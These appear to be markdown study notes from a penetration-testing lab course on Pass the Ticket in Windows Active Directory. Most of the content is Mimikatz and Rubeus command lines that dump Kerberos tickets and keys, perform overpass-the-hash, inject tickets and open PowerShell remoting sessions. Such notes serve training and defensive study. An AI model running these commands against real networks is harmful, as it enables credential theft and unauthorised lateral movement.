Pass the Ticket from Windows

Kerberos

Here's your Markdown Notes version of the full content, properly structured, titled, and formatted for clarity and reuse:

---

Pass the Ticket (PtT) - Windows

Overview

Pass the Ticket (PtT) is a lateral movement technique in Active Directory where a stolen Kerberos ticket is used to authenticate, as opposed to using an NTLM password hash.

---

🔐 Kerberos Protocol Refresher

• Kerberos is a ticket-based authentication system.

• Instead of passwords, it uses tickets:

  • TGT (Ticket Granting Ticket): Used to request TGS.

  • TGS (Ticket Granting Service): Grants access to specific resources.

Authentication Flow

1. User authenticates by encrypting a timestamp with their password hash.

2. Domain Controller (KDC) validates and returns a TGT.

3. To access a service (e.g., MSSQL), a TGS is requested using the TGT.

4. The TGS is then used for service authentication.

Refer to the "Kerberos, DNS, LDAP, MSRPC" section for foundational knowledge.

---

🛠 Scenario

In a post-compromise scenario, we:

• Gain admin access on a phished user's Windows machine.

• Use tools like Mimikatz and Rubeus to extract and manipulate tickets.

---

🎟 Harvesting Kerberos Tickets (Windows)

📥 Using Mimikatz

c:\tools> mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

• Exports .kirbi ticket files.

• Tickets with $ → Computer account.

• Tickets with service krbtgt → TGT.

📥 Using Rubeus

c:\tools> Rubeus.exe dump /nowrap

• Dumps base64 encoded tickets.

• Useful when Mimikatz exports invalid tickets (e.g., incorrect encryption).

---

🔑 Extracting Kerberos Keys

Mimikatz - sekurlsa::ekeys

mimikatz # sekurlsa::ekeys

• Extracts hashes/keys:

  • aes256_hmac

  • rc4_hmac_nt, rc4_md4, etc.

---

🧪 OverPass the Hash (Pass the Key)

Mimikatz

mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:<hash>

• Spawns a new cmd.exe session.

• Injects user identity with the provided NTLM hash.

Rubeus

Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<key> /ptt

• Requests a TGT using user’s key/hash.

• The /ptt flag submits the ticket into the session.

Note: Mimikatz requires admin rights, Rubeus does not.

---

🎫 Pass the Ticket (PtT) with Rubeus

Method 1: Request and Submit TGT

Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:<hash> /ptt

Method 2: Import .kirbi File

Rubeus.exe ptt /ticket:<filename>.kirbi

Method 3: Use Base64 Encoded Ticket

Rubeus.exe ptt /ticket:<base64_ticket>

Convert .kirbi to Base64 with PowerShell

[Convert]::ToBase64String([IO.File]::ReadAllBytes("<file>.kirbi"))

---

🎫 Pass the Ticket (PtT) with Mimikatz

mimikatz # kerberos::ptt "<file>.kirbi"

Alternative: Launch a new session with the ticket:

mimikatz # misc::cmd

---

💻 PowerShell Remoting + PtT

Prerequisites:

• Admin or Remote Management Users group membership.

• Remoting enabled on target (TCP/5985 or TCP/5986).

Mimikatz Flow:

mimikatz # kerberos::ptt "<ticket>"
# Then from same CMD:
powershell
Enter-PSSession -ComputerName <target>

Rubeus Flow:

1. Create sacrificial process:

Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

1. Inside new cmd.exe:

Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:<key> /ptt

1. Launch PowerShell session:

Enter-PSSession -ComputerName DC01

---